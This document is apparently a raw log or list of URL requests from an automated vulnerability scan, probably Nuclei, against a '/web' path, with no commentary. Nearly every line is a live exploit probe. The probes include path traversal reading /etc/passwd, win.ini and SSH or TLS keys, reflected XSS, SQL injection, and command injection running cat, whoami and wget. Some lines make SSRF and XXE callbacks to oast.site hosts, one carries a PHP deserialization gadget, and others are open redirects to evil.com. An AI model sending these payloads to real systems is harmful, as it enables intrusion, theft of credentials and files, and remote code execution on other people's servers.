/web/__raw/services/server/info/server-info?output_mode=json
/web/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text
/web/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
/web/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/web/..../..../..../..../..../..../..../..../..../windows/win.ini
/web/module/ph_simpleblog/list?sb_category=')%20AND%20false--%20-
/web/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/web/wp-login.php
/web/wp-admin/
/web/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/Admin
/web/cgi-bin/status/status.cgi
/web/....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini
/web/solr/admin/cores?wt=json
/web/dashboardUser
/web/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/assets/_core/php/profile.php
/web/test.cgi
/web/html/log
/web
/web/kindeditor/php/demo.php
/web/api/experimental/latest_runs
/web/index.asp
/web/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00
/web/assets/php/profile.php
/web/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?redirect=//evil.com
/web/pages/systemcall.php?command=cat%20/etc/passwd
/web/web/cobbler_api
/web/actions/authenticate.php
/web/__raw/services/server/info/server-info?output_mode=json
/web/help/english/index.html?javascript&
/web/php/demo.php
/web
/web/apply_sec.cgi
/web/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
/web/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://c8accf99m8v8l7afta3gcekccwoyyyybg.oast.site/
/web/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13
/web/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/web/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
/web/apply_sec.cgi
/web/ws_utc/resources/setting/options
/web/dashboardUser
/web/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/web/wp-admin/
/web/assets/php/profile.php
/web/html/log
/web/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
/web/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
/web/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/openam/ui/PWResetUserValidation
/web/log_download.cgi?type=../../etc/passwd
/web/apply_sec.cgi
/web/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
/web/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/web/api/users/search_authors
/web/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
/web/test.cgi
/web/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
/web/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini
/web/apisix/admin/routes
/web/web/cobbler_api
/web/help/english/index.html?javascript&
/web
/web/debug.cgi
/web/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00
/web/OpenAM-11.0.0/ui/PWResetUserValidation
/web/php/demo.php
/web/fileserver/test.txt
/web/base_import/static/c:/windows/win.ini
/web/
/web/vendor/qcubed/qcubed/assets/php/profile.php
/web/apply_sec.cgi
/web/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
/web/25Sm0CfYMKx4WWFungTsHeRov8n?cmd=id
/web/api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/web/webtools/control/xmlrpc
/web/admin/elfinder/elfinder-cke.html
/web/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/web/ws_utc/resources/setting/options
/web/ws_utc/resources/setting/keystore
/web/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/web/_vti_inf.html
/web/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
/web/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
/web/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
/web/log_download.cgi?type=../../etc/passwd
/web/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60
/web/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
/web/apply_sec.cgi
/web/login
/web/apply_sec.cgi
/web/api/users/search_authors
/web/log_download.cgi?type=../../etc/passwd
/web/index.php?rest_route=/whm/v3/themesettings
/web/debug.cgi
/web/cgi-bin/test-cgi
/web/wp-admin/admin-ajax.php
/web/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=
/web/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00
/web/wp-admin/options-general.php?page=smartcode
/web/fileserver/test.txt
/web/base_import/static/c:/windows/win.ini
/web/OpenAM-11.0.0/ui/PWResetUserValidation
/web/fileserver/test.txt
/web/ui/PWResetUserValidation
/web/web/static/c:/windows/win.ini
/web/_users/org.couchdb.user:poc
/web/vendor/qcubed/qcubed/assets/php/profile.php
/web/25Sm0CfYMKx4WWFungTsHeRov8n?cmd=id
/web/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
/web/admin/elfinder/elfinder-cke.html
/web/base/static/c:/windows/win.ini
/web/assets/backend/elfinder/elfinder-cke.html
/web/mifs/.;/services/LogService
/web/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/web/include/makecvs.php?Event=%60wget%20http%3A%2F%2Fc8accf99m8v8l7afta3gcekccioyyyybc.oast.site%60
/web//example.com
/web/+CSCOE+/session_password.html
/web/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==
/web/?q=node&destination=node
/web/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C
/web/wp-content/plugins/canto/includes/lib/detail.php?subdomain=c8accf99m8v8l7afta3gcekccioyyyybq.oast.site
/web/assets/elFinder-2.1.9/elfinder.html
/web/infusions/downloads/downloads.php?cat_id=${system(ls)}
/web/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS
/web/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60
/web/nuclei.txt
/web/tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Fc8accf99m8v8l7afta3gcekccioyyyybo.oast.site%60
/web/index.php?rest_route=/whm/v3/themesettings
/web/login
/web/
/web/log_download.cgi?type=../../etc/passwd
/web/ws_utc/resources/setting/keystore
/web/etc/passwd
/web/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00
/web/wp-admin/admin-ajax.php
/web/debug/pprof/
/web/cgi-bin/test-cgi
/web/fileserver/test.txt
/web/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://c8accf99m8v8l7afta3gcekccioyyyybw.oast.site
/web/.../.../.../.../.../.../.../.../.../windows/win.ini
/web/menu/ss?sid=nsroot&username=nsroot&force_setup=1
/web/wp-admin/options-general.php?page=smartcode
/web
/web/.../.../.../.../.../.../.../.../.../etc/passwd
/web/base/static/c:/windows/win.ini
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==
/web/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd
/web/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
/web/xmlpserver/ReportTemplateService.xls
/web/?author=1
/web/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=
/web/account/index.php
/web/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C
/web/new/newhttp://example.com
/web/wp-content/plugins/canto/includes/lib/detail.php?subdomain=c8accf99m8v8l7afta3gcekccioyyyybq.oast.site
/web/webadmin/clientlogin/?srid=&action=showdeny&url=
/web/assets/elFinder-2.1.9/elfinder.html
/web/wls-wsat/CoordinatorPortType
/web/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/canto/includes/lib/get.php?subdomain=c8accf99m8v8l7afta3gcekcciayyyyba.oast.site
/web/assets/elFinder/elfinder.html
/web/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS
/web/command.cgi?cat%20/etc/passwd
/web/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd
/web/wp-content/plugins/canto/includes/lib/tree.php?subdomain=c8accf99m8v8l7afta3gcekcciayyyyb4.oast.site
/web/nuclei.txt
/web/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00
/web/servlet/UploadServlet
/web/node_modules/../../../../../etc/passwd
/web/asd/../../../../../../../../etc/passwd
/web/test.txt
/web/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00
/web/_next/static/../server/pages-manifest.json
/web/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00
/web/debug/pprof/
/web/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://c8accf99m8v8l7afta3gcekccioyyyybw.oast.site
/web/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00
/web/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
/web
/web/index.php/catalogsearch/advanced/result/?name=e
/web/menu/ss?sid=nsroot&username=nsroot&force_setup=1
/web/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password
/web/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
/web/menu/neo
/web/.../.../.../.../.../.../.../.../.../etc/passwd
/web/meta
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
/web/xmlpserver/ReportTemplateService.xls
/web/account/index.php
/web/webadmin/clientlogin/?srid=&action=showdeny&url=
/web/new/newhttp://example.com
/web/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00
/web/session/create
/web/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
/web/opensis/index.php
/web/assets/elFinder/elfinder.html
/web/device.rsp?opt=user&cmd=list
/web/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php
/web/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
/web/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>
/web/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd
/web/backend/elfinder/elfinder-cke.html
/web/command.cgi?cat%20/etc/passwd
/web/anchor/errors.log
/web/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/web/wsman
/web/elfinder/elfinder-cke.html
/web/asd/../../../../../../../../etc/passwd
/web/lumis/portal/controller/xml/PageControllerXml.jsp
/web/test.txt
/web/_next/static/../server/pages-manifest.json
/web/%5C../ssl/yaws-key.pem
/web/account
/web/solr/admin/cores?wt=json
/web/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00
/web/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
/web/cgi-bin/weblogin.cgi?username=admin';cat
/web/index.php/catalogsearch/advanced/result/?name=e
/web/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password
/web/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
/web/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
/web/api/experimental/test
/web/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html
/web/menu/neo
/web/backup2.cgi
/web/menu/stc
/web/meta
/web/cgi-bin/login.cgi
/web/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
/web/opensis/index.php
/web/index.php
/web/device.rsp?opt=user&cmd=list
/web/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
/web/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php
/web/action.php
/web/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>
/web/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E
/web/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/web/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E
/web/anchor/errors.log
/web/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/web/wsman
/web/elfinder/elfinder-cke.html
/web/users/sign_in
/web/changePassword?username=administrator
/web/../../etc/passwd
/web/uploads/assets/backend/elfinder/elfinder-cke.html
/web/account
/web/%5C../ssl/yaws-key.pem
/web/
/web/solr/admin/cores?wt=json
/web/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com
/web/account
/web/cgi-bin/weblogin.cgi?username=admin';cat
/web/solr/admin/cores?wt=json
/web%C2%A7endpoint%C2%A7../../../../bin/.ssh_host_rsa_key
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
/web/api/experimental/test
/web/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
/web/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html
/web/api/experimental/dags/example_trigger_target_dag/paused/false
/web/backup2.cgi
/web/menu/stc
/web/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
/web/backup2.cgi
/web/cgi-bin/login.cgi
/web/v1/backend1
/web/pentaho/api/userrolelist/systemRoles?require-cfg.js
/web/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
/web/rapi/filedownload?filter=path:%2Fetc%2Fpasswd
/web/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
/web/index.php
/web/passwordrecovered.cgi?id=nuclei
/web/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
/web/?qtproxycall=http://c8accf99m8v8l7afta3gcekccsoyyyyde.oast.site
/web/action.php
/web/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1
/web/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E
/web/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
/web/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0
/web/manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064
/web/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/web/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/web/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/web/changePassword?username=administrator
/web/../../etc/passwd
/web/uploads/assets/backend/elfinder/elfinder-cke.html
/web/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
/web/uploads/assets/backend/elfinder/elfinder.html
/web/account
/web/solr/admin/cores?wt=json
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
/web/%5cgoogle.com/evil.html
/web/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
/web/backup2.cgi
/web/v1/backend1
/web/passwordrecovered.cgi?id=nuclei
/web/backend/admin/common/clearcache?previousUrl=http://www.example.com
/web/api/experimental/dags/example_trigger_target_dag/paused/false
/web/pentaho/api/userrolelist/systemRoles?require-cfg.js
/web/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
/web/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1
/web/api/userrolelist/systemRoles?require-cfg.js
/web/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
/web/?url=http://example.com
/web/manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064
/web/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/web/uploads/assets/backend/elfinder/elfinder.html
/web/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
/web/manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064
/web/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
/web/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0
/web/_search?pretty
/web/cgi/networkDiag.cgi
/web/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
/web/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/?url=http://0177.0.0.1/server-status
/web/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
/web/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/25Sm0FBhbqhTvE2qy3Zpm1umwLx/)%3B%2F%2F
/web/?qtproxycall=http://c8accf99m8v8l7afta3gcekccsoyyyyde.oast.site
/web/api/experimental/dags/example_trigger_target_dag/dag_runs
/web/pme/media/
/web/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
/web/uploads/elfinder/elfinder-cke.html
/web/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
/web/index.jsp
/web/wp-admin/options-general.php?page=yuzo-related-post
/web/tests/generate.php
/web/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
/web/backend/admin/common/clearcache?previousUrl=http://www.example.com
/web/xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//c8accf99m8v8l7afta3gcekcczyyyyydq.oast.site/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123
/web/_next/../../../../../../../../../../etc/passwd
/web/integration/saveGangster.action
/web/lucee/admin/imgProcess.cfm?file=/whatever
/web/?action=command&command=set_city_timezone&value=$(wget%20http://c8accf99m8v8l7afta3gcekcczeyyyydo.oast.site))
/web/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
/web/?host=http://0177.0.0.1/server-status
/web/magmi/web/magmi_saveprofile.php
/web/?file=http://0177.0.0.1/etc/passwd
/web/img/../../../../../../etc/passwd
/web/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
/web/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
/web/cgi/networkDiag.cgi
/web/_search?pretty
/web/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
/web/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
/web/LetsEncrypt/Index?fileName=/etc/passwd
/web/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
/web/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/25Sm0FBhbqhTvE2qy3Zpm1umwLx/)%3B%2F%2F
/web/login.htm
/web/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
/web/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E
/web/plugins/servlet/gadgets/makeRequest
/web/pme/media/
/web/
/web/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd
/web/wp-admin/options-general.php?page=yuzo-related-post
/web/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
/web/tests/generate.php
/web/wls-wsat/RegistrationRequesterPortType
/web/index.jsp
/web/xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//c8accf99m8v8l7afta3gcekcczyyyyydq.oast.site/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123
/web/upload
/web/_next/../../../../../../../../../../etc/passwd
/web/v1/25Sm0FS83mNki6FYNuAzduhmvka.php
/web/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/web/
/web/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
/web/system/console?.css
/web/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00
/web/integration/saveGangster.action
/web/lucee/admin/imgProcess.cfm?file=/whatever
/web/wp-admin/admin-ajax.php
/web
/web/lucee/admin/imgProcess.cfm?file=/../../../context/25Sm0FexS8pZEQkvCnVBkuEqdkf.cfm
/web/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
/web/magmi/web/magmi_saveprofile.php
/web/magmi/web/magmi_run.php
/web/boafrm/formSysCmd
/web/plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml
/web/magmi/web/info.php
/web/img/../../../../../../etc/passwd
/web/wp-admin/admin-ajax.php?action=moove_read_xml
/web/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
/web/AdminTools/querybuilder/logon?framework=
/web/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/web/ui/vropspluginui/rest/services/getvcdetails
/web/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
/web/../../../../../../../../../../../../../etc/passwd
/web/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
/web/wls-wsat/CoordinatorPortType
/web/login.htm
/web/te%3Cimg%20src=x%20onerror=alert(42)%3Est
/web/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
/web/plugins/servlet/gadgets/makeRequest
/web/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
/web/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd
/web/wls-wsat/RegistrationRequesterPortType
/web/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E
/web/Images/Remote?imageUrl=http://c8accf99m8v8l7afta3gcekcczoyyyyry.oast.site
/web/cgi-bin/mainfunction.cgi
/web/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
/web/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/web/system/console?.css
/web/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E
/web/upload
/web/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
/web/download/index.php?file=../../../../../../../../../etc/passwd
/web/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00
/web/index.php/System/MailConnect/host/c8accf99m8v8l7afta3gcekcczoyyyyrn.oast.site/port/80/secure/
/web/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/web/api/snapshots/:key
/web/Side.php
/web/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1
/web/lucee/admin/imgProcess.cfm?file=/../../../context/25Sm0FexS8pZEQkvCnVBkuEqdkf.cfm
/web
/web/wp-admin/admin-ajax.php
/web/../../../../../../etc/passwd
/web/./RestAPI/LogonCustomization
/web/wp-content/uploads/workreap-temp/25Sm0KD67eWjLShxroH6wiOuYsp.php
/web/lucee/25Sm0FexS8pZEQkvCnVBkuEqdkf.cfm
/web/boafrm/formSysCmd
/web/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00
/web/plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml
/web/magmi/web/info.php
/web/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
